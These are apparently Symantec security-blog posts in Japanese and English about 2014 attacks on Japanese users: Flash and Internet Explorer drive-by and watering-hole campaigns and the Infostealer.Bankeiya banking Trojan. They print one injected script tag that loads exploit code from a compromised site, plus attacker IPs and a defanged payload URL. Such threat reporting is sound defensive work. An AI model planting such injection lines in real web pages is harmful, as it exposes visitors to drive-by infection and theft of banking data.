New Back Door Trojan Program is No Fool
Malware authors leave an interesting message in the code of a new threat.
Read more…
Malware authors leave an interesting message in the code of a new threat.
Read more…
Malware authors leave an interesting message in the code of a new threat.
Read more…
シマンテックは 5 月中旬、Adobe Flash Player に存在するバッファオーバーフローの脆弱性(CVE-2014-0515)を悪用する攻撃が徐々に増加していることを確認しましたが、この傾向はまだ続いています。シマンテックの調査によると、現在この攻撃は大規模な範囲で行われており、その大部分は日本を標的としていることがわかっています。
4 月にさかのぼると、CVE-2014-0515 は当初、特定の組織や業界を狙った水飲み場型攻撃で悪用されていました。その後同じ 4 月に Adobe 社はこの脆弱性に対するパッチをリリースしましたが、シマンテックの遠隔測定によると、それから数週間が経った現在では、当初の標的ではなく幅広いインターネットユーザーを狙って悪用コードが使われていることが判明しています。
図 1. Adobe Flash Player の脆弱性を悪用する攻撃の大部分は日本を標的に
図 1 に示すように、この脆弱性を悪用する攻撃の 90% 以上は日本のユーザーを標的としています。攻撃は主にドライブバイダウンロードによって実行され、悪質なコードをホストする、侵害された正規の Web サイトが利用されています。そういった Web サイトから、攻撃者が用意した悪質なサイトにトラフィックがリダイレクトされます。
日本での攻撃を引き起こすように侵害された Web サイトは次のとおりです。
上記の Web サイトに加えて、JUGEM レンタルサービスを使用しているブログサイトも影響を受けていました。
ブラウザが悪質なサイト(IP アドレス 1.234.35.42)にリダイレクトされると、CVE-2014-0515 の悪用を試みる悪用コードが読み込まれます。古いバージョンのソフトウェアがコンピュータにインストールされている場合、この攻撃により一連の悪質なファイルが実行され、マルウェア Infostealer.Bankeiya.B に感染してしまいます。このマルウェアがユーザーから銀行口座情報を盗み取るのです。
図 2. 日本のユーザーを狙う攻撃件数の推移
図 3. 日本のユーザーを狙う攻撃の累積件数
Infostealer.Bankeiya.B は、Google Chrome、Mozilla Firefox、および Microsoft Internet Explorer を監視し、通常オンラインバンキング取引で使われる特定のユーザーデータを収集します。
また、Infostealer.Bankeiya.B は自身を更新して、さらにほかの銀行を標的にしたり別の悪質な処理を実行するための機能を追加したりすることができます。
Adobe Flash Player に存在するバッファオーバーフローの脆弱性(CVE-2014-0515)は広範囲に悪用されているため、Adobe Flash を最新のバージョンに更新することをお勧めします。オペレーティングシステムやコンピュータにインストールされているアプリケーションだけでなく、ブラウザで使用しているプラグインにもパッチを適用することが重要です。
保護対策
シマンテック製品をお使いのお客様は、以下の検出定義によってこの攻撃から保護されています。
ウイルス対策
侵入防止システム
* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。
In mid-May, Symantec observed a gradual uptick in attacks exploiting the Adobe Flash Player Buffer Overflow Vulnerability (CVE-2014-0515), and we continued to monitor this trend. Symantec’s research now indicates that the attacks are being performed on a massive scale and that majority of them are focused on Japan.
Back in April, CVE-2014-0515 was originally being exploited in watering-hole attacks against specific organizations or industries. Later in the same month, Adobe released a patch for the vulnerability. However, just a few weeks later Symantec telemetry indicated that instead of the initial targets, the exploit was now being used to target a wider range of Internet users.
Figure 1. Attackers using the Adobe exploit mostly targeting Japan
As seen in Figure 1, more than 90 percent of the attacks exploiting the vulnerability are targeting Japanese users. The attacks are typically carried out through drive-by-download and leverage compromised legitimate websites to host malicious code. The websites then redirect traffic to a malicious site prepared by the attacker.
The following websites were compromised to trigger attacks in Japan:
In addition to the above websites, blog sites that use the JUGEM rental service are also affected.
Once the browsers are redirected to the malicious site, which has the IP address 1.234.35.42, they render the exploit code that attempts to exploit CVE-2014-0515. If an older version of the software is installed on the computer, the attack will execute a series of malicious files to compromise the computer with the malware Infostealer.Bankeiya.B, which steals banking information from users.
Figure 2. Daily number of attacks on Japanese users
Figure 3. Cumulative number of attacks on Japanese users
Infostealer.Bankeiya.B monitors the Web browsers Google Chrome, Mozilla Firefox and Microsoft Internet Explorer. The Trojan gathers specific user data typically found in online banking transactions.
The malware can also update itself, enabling it to target more banks and add more capabilities in order to perform additional malicious actions.
Since the Adobe Flash Player Buffer Overflow Vulnerability (CVE-2014-0515) is used heavily in the wild, Symantec advises users to update Adobe Flash to the latest version. It is important to patch not only the operating system and applications installed on computers, but also any plug-ins used by browsers.
Protection
Symantec customers are protected against this attack with the following detections:
AV
IPS
今年 3 月、シマンテックは Internet Explorer 8 のゼロデイ脆弱性、「Microsoft Internet Explorer のメモリ破損の脆弱性(CVE-2014-0324)」を悪用した水飲み場型攻撃の可能性についてブログでお伝えしました。シマンテックはこの攻撃について調査を続け、この攻撃の目的が日本のバスケットボール界に関係のあるユーザーを狙うことにあったと結論付け、これを「Operation Backdoor Cut(オペレーションバックドアカット)」と命名しました。こうした結論を導き出すことができたのは、長期にわたり観測した結果、この脆弱性を悪用した水飲み場型攻撃が、日本バスケットボール協会(JBA)の公式サイトのランディングページだけをホストとして利用していることが判明したためです。3 月にこのゼロデイ脆弱性が確認されて以降、シマンテックの遠隔測定では、これ以外の Web サイト上で攻撃は確認されていません。
図 1. JBA のランディングページ
JBA の Web サイトが最初に侵害されたのは 2 月中旬のことです。サイトの HTML コードに悪質なスクリプトがインジェクトされ、このスクリプトによってバックグラウンドで外部サイトから悪用コードがロードされていました。その後、このサイトは正常化されたように見えましたが、2 月下旬には再び侵害され、同様のスクリプトがインジェクトされました。そして、3 月 11 日にマイクロソフト月例パッチとして CVE-2014-0324 に対するパッチがリリースされてからわずか数時間後に、三たび悪質なスクリプトがインジェクトされます。この 3 回とも、JBA サイトにインジェクトされたのは、悪用コードをホストしている、さらに別の侵害された Web サイトにトラフィックをリダイレクトするための短いスクリプトです。この Web サイトの所在地は韓国のソウルです。この攻撃で使われているスクリプトの例を次に示します。
<script type=”text/javascript” src=”https://www.[削除済み].kr/uc/inc_jba.php”></script>
侵害されて実際に悪用コードをホストしていたのは、韓国の大手カフェチェーンに関連する Web サイトです。3 回の侵入のたびに、このサイトの別々のディレクトリにファイルが保存されていました。このサイトが、攻撃のメイン部分のホストとして選ばれたのは、著名な企業のサイトであり、企業のネットワークを監視しているセキュリティ製品やサービスから嫌疑をかけられる可能性が低いためでしょう。各ディレクトリに含まれるファイルは、以下のとおりです。
JBA の Web サイトにインジェクトされた短いスクリプトによって、inc_jba.php ファイルに誘導されます。このファイルには、標的となったユーザーのコンピュータ環境(オペレーティングシステム(OS)のバージョン、OS の言語、インストールされている Microsoft Office のバージョンなど)の情報をチェックする JavaScript が含まれています。この JavaScript は、cookie をチェックとして使う前に、ブラウザがこのページにアクセスしたことがあるかどうかも確認します。過去にアクセスしたことがある場合、ブラウザは悪用コードに誘導されません。これは、ユーザーがセキュリティ研究者である場合を警戒した対策です。コンピュータ環境が、指定された条件を満たしている場合、ブラウザは 4 つの悪用ページのいずれかにリダイレクトされます。悪用コードは、環境に応じて次の 4 つの亜種が用意されています。
実行に成功すると、悪用コードは同じディレクトリから inc_module.jpg をダウンロードして実行し、最終的なペイロードの URL を取得します。拡張子は .jpg ですが、これは画像ファイルではなく、実際にはペイロードの場所について暗号化された情報を含むデータファイルです。ブラウザは、ソウルにある別のサーバーにリダイレクトされますが、これは攻撃者が SSL プロトコルでネットワークトラフィックを暗号化して用意したものと考えられます。ソウルに置かれているサーバーの URL は以下のとおりです。
https://login[ドット]imicrosoft[ドット]org/feed
このサイトが、北京に拠点を置く企業によってレンタルされている仮想プライベートサーバー(VPS)上で管理されていた点は注目に値します。この企業は、米国と韓国にある VPS を提供することを業務にしているようです。このプロバイダが選ばれたのは、サーバーの位置情報によるものと思ってまず間違いないでしょう。ペイロードをホストしているサーバーの Geo-IP 位置情報が、攻撃の成否を左右したはずだからです。
図 2. VPS サイトのログイン画面
攻撃者は、早々に撤収して短期間で攻撃活動を終わらせる戦略を取ったか、あるいはセキュリティ研究者がペイロードをダウンロードできないようにする高度な侵入手法を編み出したか、いずれかだったと考えられます。いずれにしても、このサーバーからペイロードを取得することはできませんでした。
シマンテックが確認した限りでは、「Operation Backdoor Cut」の動機は JBA を水飲み場サイトとして利用して、そこからのトラフィックを誘導することだけだと思われます。なぜなら、他の Web サイトはまったく影響を受けていないからです。悪質なスクリプトファイルの名前(inc_jba.php)と、ページへのアクセスカウントに使われた cookie の名前(JBA20140312v2)は、どちらも JBA ページの一部であるかのように偽装されています。シマンテックがこの悪用について確認した検出結果はすべて、JBA の Web サイトからのトラフィックでした。
バスケットボール界が狙われた理由
なぜ日本のバスケットボール界が今回の標的になったのか不思議に思う方もいるでしょう。スポーツ界は国民とも政府とも深く結び付いており、バスケットボールもその例外ではありません。日本のバスケットボール界と日本政府との間には、いささか興味深い関係があります。JBA の会長は、日本の現副総理兼財務大臣です。しかも、元総理大臣でもあります。このような関係こそ、JBA サイトに水飲み場型攻撃が仕掛けられた動機かもしれません。つまり、JBA の Web サイトが、日本政府への格好の侵入口またはゲートウェイと見なされたのかもしれません。
オリンピックが動機という可能性もあります。主要なスポーツ団体のひとつである JBA は、2020 年東京オリンピックの統括機関である東京オリンピック・パラリンピック競技大会組織委員会と密接な関係があります。オリンピック関連組織が頻繁にサイバースパイ活動の標的になることは、よく知られています。たとえば 2011 年、「Operation Shady RAT」と命名された攻撃を調査したときのデータでも、いくつかのオリンピック関連組織が攻撃を受け、そのネットワークのコンピュータが侵入を受けたことが判明しています。日本オリンピック委員会(JOC)も、このとき被害を受けました。日本は昨年、2020 年のオリンピック開催地に選ばれ、現在その準備を進めています。オリンピック開催地という名誉と引き換えにサイバー攻撃が増える可能性については、日本でも十分に認識されています。実際、日本政府は今から 6 年後に開催されるオリンピック大会に備えて、サイバーセキュリティ演習を 3 月に実施したところです。しかし、攻撃はすでに始まっているかもしれず、この演習よりも前にとっくに始まっていた可能性すらあります。
政府機関、製造業、金融などの業種は標的になりやすいと言えますが、標的型攻撃を受けるリスクはどの業種でも変わりません。そのことを認識して、相応にネットワークを保護することが重要です。企業や組織は、準備を怠らず、万一ネットワークに攻撃者の侵入を許してしまった場合の対策を講じておく必要があります。
シマンテックは、「Microsoft Internet Explorer のメモリ破損の脆弱性(CVE-2014-0324)」から保護するために、以下の検出定義ファイルを提供しています。
ウイルス対策
侵入防止システム
* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。
Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.
Figure 1. JBA landing page
The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. In all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website hosting the exploit code located in Seoul, South Korea. The following is an example of the script used in the attacks:
<script type=”text/javascript” src=”https://www.[REMOVED].kr/uc/inc_jba.php”></script>
The compromised website, associated with a major Korean Café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack due to it being a reputable business which would not be likely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:
The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment things such as the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also checks if the browser has ever visited the page before by using a cookie as a check. If the page has been visited before, the browser is not directed to the exploit code as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for different environments:
If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker using the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:
https://login[dot]imicrosoft[dot]org/feed
Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the Unites States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.
Figure 2. Login screen of the VPS site
The attackers had either a strategy to close shop quickly to make their campaign short lived or some sophisticated evasion technique was implemented to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.
From our observations, we believe the motive of Operation Backdoor Cut was to solely draw traffic from the JBA watering hole site as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page, both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.
Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.
The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.
Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude the network.
Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):
AV
IPS
ここしばらく、日本のインターネットユーザーは SpyEye(Trojan.Spyeye)や Zeus(Trojan.Zbot)といった、オンラインバンキングを狙うトロイの木馬への対応に悩まされ続けています。これらのマルウェアによる被害件数も、銀行口座から引き出された金額も、驚くほどの割合で急増しています。警察庁によれば、オンラインバンキングでの不正な引き出しの件数は、2012 年の 64 件から、2013 年には 1,315 件へと跳ね上がりました。これだけでも、その深刻さがうかがえるでしょう。預金の被害額も、2012 年には 4,800 万円だったものが、2013 年には約 14 億円にのぼっています。
先日は、日本のユーザーから銀行口座に関する情報を盗み出そうとする複数のマルウェアファミリーも見つかっています。最近確認されたものとして Infostealer.Ayufos、Infostealer.Torpplar、Infostealer.Bankeiya がありますが、今回は Infostealer.Bankeiya について詳しく説明します。
シマンテックが Infostealer.Bankeiya に注目し始めたのは、「Microsoft Internet Explorer に存在する解放後使用のリモートコード実行の脆弱性」(CVE-2014-0322)を悪用する攻撃の拡散が確認された 2 月のことです。この脆弱性についても、以前のブログでお伝えしています。当時はまだ、この脆弱性に対するパッチが公開されていなかったため、Internet Explorer 9 と 10 のユーザーは無防備なままになっていました。Infostealer.Bankeiya の開発者は、その状況につけ込み、さまざまな正規の Web サイトに侵入してドライブバイダウンロード攻撃を仕掛けたのです。3 月 11 日にパッチが公開されてもなお、盛んな攻撃が続きました。攻撃された正規サイトには、旅行代理店、テレビ局、宝くじのサイトのようにアクセス数の多いものから、少数ながらオンラインショップ、コミュニティサイト、個人 Web サイトなど小規模なサイトも含まれています。
Infostealer.Bankeiya の調査をさらに進めたところ、これは新しいマルウェアファミリーではないことが判明しました。実際に最初の亜種が発見されたのは 2013 年 10 月のことで、それ以来多くの亜種が確認されています。Infostealer.Bankeiya の目的は、侵入先のコンピュータからオンラインバンキングに関する情報を盗み出すことだけです。システムに感染するときに、Internet Explorer の脆弱性だけでなく、「Oracle Java SE に存在するリモートコード実行の脆弱性」(CVE-2013-2463)も悪用されていることをシマンテックは確認しています。他の脆弱性が悪用されている可能性も否定できません。
Infostealer.Bankeiya による典型的な攻撃の手順は、以下のとおりです。
図 1. Infostealer.Bankeiya の C&C サーバーのログインページ
シマンテックは、コンピュータに侵入した Infostealer.Bankeiya からそれ以上のデータが攻撃者に送信されないように、既知の C&C サーバーをシンクホールに捕捉しました。また、被害者のコンピュータからのアクセスログを記録してサーバーを監視し、この攻撃の拡散状況も概算しました。シマンテックがこれを実行したのは 3 月中旬のある 1 週間ですが、その結果によると最大 20,000 台のコンピュータが感染していたことになります。その大多数が日本国内の IP アドレスからのアクセスで、そのことに驚きはありませんが、感染件数を考えるといささか深刻です。以下に示す数字はインターネット上でサーバーにアクセスしていたデバイスの数に基づいており、一部のデバイスは感染していないシステムのため除外されていることに注意してください。
図 2. C&C サーバーにアクセスしていたデバイス
シンクホールのデータによれば、日本に次いで被害が多かったのは香港です。これは、CVE-2014-0322 の悪用コードに狙われたコンピュータについて以前のブログで示したデータとも一致していますが、それには理由があります。シマンテックの調査では、ファイルを使って Bitcoin をマイニング(採掘)する別種の攻撃との関連性も確認されています。侵入を受けた香港のフォーラムサイトにアクセスするユーザーを標的とした攻撃もあります。このケースでは、コンピュータのハードウェアを悪用して Bitcoin を採掘するために、jhProtominer という Bitcoin マイニングソフトウェアを被害者のコンピュータにダウンロードして実行する目的で CVE-2014-0322 の悪用コードが使われています。攻撃者は、国境を越えた別のユーザーを標的にすることにも意欲的なようで、利益のためならどのような機会も利用しようと狙っています。
マルウェア感染の多くは、侵入を受けた正規のサイトにアクセスしたために起きています。あらゆるソフトウェア製品は、最新のパッチを適用して頻繁に更新することが重要です。Infostealer.Bankeiya に悪用された脆弱性のケースのように、パッチが公開されていない場合もあります。そのような場合でも、セキュリティソフトウェアはコンピュータのセキュリティを強化するために効果があるので、セキュリティソフトウェアをインストールして最新の状態に保つようにしてください。こうした推奨事項に従えば、ほとんどの感染は予防できるものです。
* 日本語版セキュリティレスポンスブログの RSS フィードを購読するには、http://www.symantec.com/connect/ja/item-feeds/blog/2261/feed/all/ja にアクセスしてください。
In the recent years, the Japanese internet community has faced difficult times trying to combat financial Trojans such as SpyEye (Trojan.Spyeye) and Zeus (Trojan.Zbot). The number of victims affected and the amount of funds withdrawn from bank accounts due to the compromise are increasing at an alarming rate. Just to give you an idea, according to the Japanese National Police Agency, the number of reported illegal Internet banking withdrawals jumped from 64 incidents in 2012 to 1,315 incidents in 2013. The loss in savings amounted to approximately 1.4 billion yen (US$ 14 million) in 2013, up from 48 million yen (US$ 480,000) in 2012.
More recently, the nation has also discovered that multiple malware families dedicated to stealing banking details from Japanese users are being developed. Recently, we have seen the development of Infostealer.Ayufos, Infostealer.Torpplar, as well as Infostealer.Bankeiya. Today, we are going to take a closer look at Infostealer.Bankeiya.
We became interested in this Trojan when we observed a widespread attack exploiting the Internet Explorer Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability (CVE-2014-0322) in February, which we published a blog on. At the time, there was no patch available for the vulnerability which left users of Internet Explorer 9 and 10 insecure. The Infostealer.Bankeiya developer decided to take advantage of the situation and compromised various legitimate websites in order to perform drive-by-download attacks. Even after the patch was released on March 11, the aggressive attacks have continued. These legitimate sites include commonly visited websites such as a Japanese tour provider, TV channel site, and a lottery site as well as a handful of small sites including online shops, community websites, and personal websites, among others.
After further investigating the malware we noticed that this was not a new family of malware. The very first variant was actually discovered in October 2013 and a large number of variants have been observed since. The sole purpose of Infostealer.Bankeiya is to steal banking details from compromised computers. Besides using the Internet Explorer vulnerability, we have also confirmed that Oracle Java SE Remote Code Execution Vulnerability (CVE-2013-2463) is being exploited to infect systems with Infostealer.Bankeiya as well. Other vulnerabilities could also be exploited.
A typical Infostealer.Bankeiya attack works like this:
Figure 1. Login page for Infostealer.Bankeiya command-and-control server
Symantec sinkholed known C& C servers to prevent the malware on the compromised computers from transmitting any further data to the attacker. We also monitored the servers by logging the accesses made by the victims’ computers in order to estimate how successful the attacks had been. We did this for a week in mid-March and the results indicate that up to 20,000 computers could have been compromised. A majority of accesses were coming from Japanese IP addresses. This is not surprising, but the sheer volume is a bit alarming. Please note that the following figure is based on the number of devices on the Internet accessing the servers and some devices were removed because they were non-infected systems.
Figure 2. Devices accessing the command-and-control servers
According to the sinkhole data, the second largest number of hits came from Hong Kong. This is also in line with the figure we provided in our previous blog about computers targeted with the CVE-2014-0322 exploit code. There is a reason for this. During our investigation we also noticed a connection with another type of attack that uses files to mine for bitcoins. One particular attack targeted users visiting a compromised forum site in Hong Kong. In this case, the CVE-2014-0322 exploit code was used to download and execute bitcoin miner software called jhProtominer on the victim’s computer in order to abuse the computer’s hardware to mine for the virtual coin. The attacker appears to be motivated enough to target different audiences across borders and is looking for any type of opportunity to make a profit.
Many malware infections occur as a result of visiting legitimate sites that have been compromised. It is vital that all software products are frequently updated so that the most recent patches are applied. In some cases, a patch will not be available, as was the case for one of the vulnerabilities used by Infostealer.Bankeiya. Security software can be used to strengthen the computer’s security status in such cases. So we urge you to install security software and keep it up-to-date. By following these recommendations, most infections can be prevented.